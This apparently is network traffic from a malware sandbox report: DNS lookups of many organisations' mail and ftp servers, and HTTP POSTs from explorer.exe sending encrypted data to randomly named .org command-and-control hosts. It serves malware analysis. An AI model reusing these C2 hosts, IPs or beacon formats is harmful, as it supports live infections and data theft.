Dec 22, 2023 21:15:34.368168116 CET	1.1.1.1	192.168.2.4	0x51ca	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.368168116 CET	1.1.1.1	192.168.2.4	0x51ca	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.378474951 CET	1.1.1.1	192.168.2.4	0xef4e	Name error (3)	mail.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.388041973 CET	1.1.1.1	192.168.2.4	0xc2d6	No error (0)	ftp.oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.388097048 CET	1.1.1.1	192.168.2.4	0xc2d6	No error (0)	ftp.oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.408246994 CET	1.1.1.1	192.168.2.4	0x43c9	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.408246994 CET	1.1.1.1	192.168.2.4	0x43c9	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418597937 CET	1.1.1.1	192.168.2.4	0x452c	No error (0)	mail.intermountainmls.com		66.232.64.219	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418610096 CET	1.1.1.1	192.168.2.4	0xd9d1	Name error (3)	ftp.thenile.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418756008 CET	1.1.1.1	192.168.2.4	0x9252	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418756008 CET	1.1.1.1	192.168.2.4	0x9252	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418951988 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	ftp.mcammond.net	static.turbifysites.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418951988 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	static.turbifysites.com		35.168.67.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.418951988 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	static.turbifysites.com		3.230.199.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419020891 CET	1.1.1.1	192.168.2.4	0x43c9	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419020891 CET	1.1.1.1	192.168.2.4	0x43c9	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419085979 CET	1.1.1.1	192.168.2.4	0xef4e	Name error (3)	mail.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419095993 CET	1.1.1.1	192.168.2.4	0xc3ec	Name error (3)	pop.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419106007 CET	1.1.1.1	192.168.2.4	0x8b0b	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419106007 CET	1.1.1.1	192.168.2.4	0x8b0b	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419117928 CET	1.1.1.1	192.168.2.4	0x51ca	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419117928 CET	1.1.1.1	192.168.2.4	0x51ca	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419275045 CET	1.1.1.1	192.168.2.4	0x1f12	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419286966 CET	1.1.1.1	192.168.2.4	0x7b24	Name error (3)	ssh.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419477940 CET	1.1.1.1	192.168.2.4	0xff73	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419477940 CET	1.1.1.1	192.168.2.4	0xff73	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419585943 CET	1.1.1.1	192.168.2.4	0xa42d	Name error (3)	mail.loghole.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.6	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.17	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.1	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419883013 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.42.13	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419893026 CET	1.1.1.1	192.168.2.4	0xa92	No error (0)	spool.mail.gandi.net		217.70.178.1	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.419945002 CET	1.1.1.1	192.168.2.4	0x14b4	No error (0)	pop.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.420063972 CET	1.1.1.1	192.168.2.4	0x3eec	Name error (3)	relay.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.458257914 CET	1.1.1.1	192.168.2.4	0xbd33	Name error (3)	mail.mailbox.lpl.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.458370924 CET	1.1.1.1	192.168.2.4	0xbd33	Name error (3)	mail.mailbox.lpl.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.098153114 CET	1.1.1.1	192.168.2.4	0x4283	Server failure (2)	smtp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.098166943 CET	1.1.1.1	192.168.2.4	0x4283	Server failure (2)	smtp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881716967 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	mail.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881716967 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881716967 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881716967 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881771088 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	mail.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881771088 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881771088 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881771088 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881856918 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	mail.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881856918 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881856918 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.881856918 CET	1.1.1.1	192.168.2.4	0x1a74	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.644999981 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	ftp.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.644999981 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.644999981 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.644999981 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645015001 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	ftp.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645015001 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645015001 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645015001 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645025015 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	ftp.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645025015 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645025015 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645025015 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645685911 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	mail.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645685911 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645685911 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645685911 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645697117 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	mail.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645697117 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645697117 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645697117 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645705938 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	mail.keywordranker.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645705938 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645705938 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:36.645705938 CET	1.1.1.1	192.168.2.4	0xbe67	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789365053 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	ftp.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789365053 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789365053 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789365053 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789468050 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	ftp.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789468050 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789468050 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789468050 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789522886 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	ftp.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789522886 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789522886 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789522886 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789570093 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	ftp.yuejichem.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789570093 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789570093 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.789570093 CET	1.1.1.1	192.168.2.4	0x7123	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		187.140.17.135	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		179.25.109.186	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		190.187.52.42	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		211.168.53.110	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		211.181.24.132	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247486115 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		187.140.17.135	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		179.25.109.186	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		190.187.52.42	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		211.168.53.110	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		211.181.24.132	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:43.247551918 CET	1.1.1.1	192.168.2.4	0xae41	No error (0)	humydrole.com		175.120.254.9	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	34.94.245.237	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:15.778820992 CET	276	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xnfvbfpcmdrrdwm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: sumagulituyo.org
Dec 22, 2023 21:12:15.778852940 CET	189	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f8 b1 0e e8 Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bOoyXv/u_U^SZZ^ h52_rP8M%&7]\4*`irpm
Dec 22, 2023 21:12:16.039258003 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:12:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=09388eac863afe046876ca6247a4c21d\|102.129.152.212\|1703275935\|1703275935\|0\|1\|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	104.198.2.251	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:16.868071079 CET	275	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uoqqikmfrjbvc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 248 Host: snukerukeutit.org
Dec 22, 2023 21:12:16.868103981 CET	248	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 aa dd 24 d1 Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bO$ef/k*1vN -!6jgA61\| {b?HA!#'u?(qP$95qnxk%#ciHTK!{~fb[<,
Dec 22, 2023 21:12:17.134613991 CET	423	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:12:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b30e164881aac235adc75a744f6c6bd0\|102.129.152.212\|1703275936\|1703275936\|0\|1\|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	34.143.166.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:17.952379942 CET	276	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ccmcywcjcfg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: lightseinsteniki.org
Dec 22, 2023 21:12:17.952447891 CET	135	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8a f9 35 cd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bO5 .Zf1&m$95cH_*0
Dec 22, 2023 21:12:18.533154964 CET	426	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:12:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=909e0f70beb1d9d3db648d8166035a4f\|102.129.152.212\|1703275938\|1703275938\|0\|1\|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	34.143.166.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:19.914469004 CET	273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtitvuosnrwc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: liuliuoumumy.org
Dec 22, 2023 21:12:19.914513111 CET	328	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f8 ac 26 d3 Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bO&;%.&L<Ct(W(We_rZmqD'8'yH&=?9_}OqC:6IE_LEA{!+cs^(^4p"6sr
Dec 22, 2023 21:12:20.496906042 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:12:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=da6fb6c82e9eef4a57ebdab442ffacfb\|102.129.152.212\|1703275940\|1703275940\|0\|1\|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
